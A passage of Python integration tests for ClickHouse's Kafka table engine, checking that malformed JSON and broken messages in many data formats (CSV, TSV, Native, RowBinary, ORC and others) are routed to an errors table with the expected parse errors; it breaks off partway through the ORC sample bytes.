def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# we don't care on which position error will be added
# (we skip whole broken message), but we need to be
# sure that at least one error will be added,
# otherwise test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def test_kafka_formats_with_broken_message(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse JSON string: expected opening quote"}''',
'printable':True,
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# broken message
'id=0\tblockNo=BAD\tval1=AM\tval2=0.5\tval3=1\n',
],
'expected':'{"raw_message":"id=0\\tblockNo=BAD\\tval1=AM\\tval2=0.5\\tval3=1\\n","error":"Found garbage after field in TSKV format: blockNo: (at row 1)\\n"}',
'printable':True,
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
# broken message
'0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
# broken message
'0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# broken message
'"id","blockNo","val1","val2","val3"\n0,"BAD","AM",0.5,1\n',
],
'expected':'''{"raw_message":"\\"id\\",\\"blockNo\\",\\"val1\\",\\"val2\\",\\"val3\\"\\n0,\\"BAD\\",\\"AM\\",0.5,1\\n","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"AM\\",0.5,1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
# broken message
"(0,'BAD','AM',0.5,1)",
],
'expected':r'''{"raw_message":"(0,'BAD','AM',0.5,1)","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception.: while executing 'FUNCTION _CAST(assumeNotNull(_dummy_0) :: 2, 'UInt16' :: 1) -> _CAST(assumeNotNull(_dummy_0), 'UInt16') UInt16 : 4'"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'supports_empty_value': True,
'printable':True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# broken message
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\tBAD\tAM\t0.5\t1\n',
],
'expected':'''{"raw_message":"id\\tblockNo\\tval1\\tval2\\tval3\\nInt64\\tUInt16\\tString\\tFloat32\\tUInt8\\n0\\tBAD\\tAM\\t0.5\\t1\\n","error":"Cannot parse input: expected '\\\\t' before: 'BAD\\\\tAM\\\\t0.5\\\\t1\\\\n': Could not print diagnostic info because two last rows aren't in buffer (rare case)\\n"}''',
'printable':True,
},
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# broken message
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x